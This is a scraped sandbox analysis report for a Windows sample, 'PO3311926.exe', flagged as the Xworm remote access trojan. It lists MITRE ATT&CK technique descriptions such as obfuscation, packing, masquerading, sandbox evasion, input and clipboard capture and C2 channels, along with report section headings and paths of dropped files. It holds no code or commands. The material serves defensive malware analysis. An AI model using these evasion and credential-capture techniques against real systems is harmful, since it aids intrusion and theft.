Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO3311926.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Temp\RarSFX0\aijs.docx

C:\Users\user\AppData\Local\Temp\RarSFX0\cqeg.bmp

C:\Users\user\AppData\Local\Temp\RarSFX0\ensfhqoc.dat

C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xl

C:\Users\user\AppData\Local\Temp\RarSFX0\oahtefaij.docx

C:\Users\user\AppData\Local\Temp\RarSFX0\oewmscssx.xl

C:\Users\user\AppData\Local\Temp\RarSFX0\oqrcndmig.mp3

C:\Users\user\AppData\Local\Temp\RarSFX0\pxxdqattof.bin

C:\Users\user\AppData\Local\Temp\RarSFX0\qcndm.jpg

Windows Analysis Report
PO3311926.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre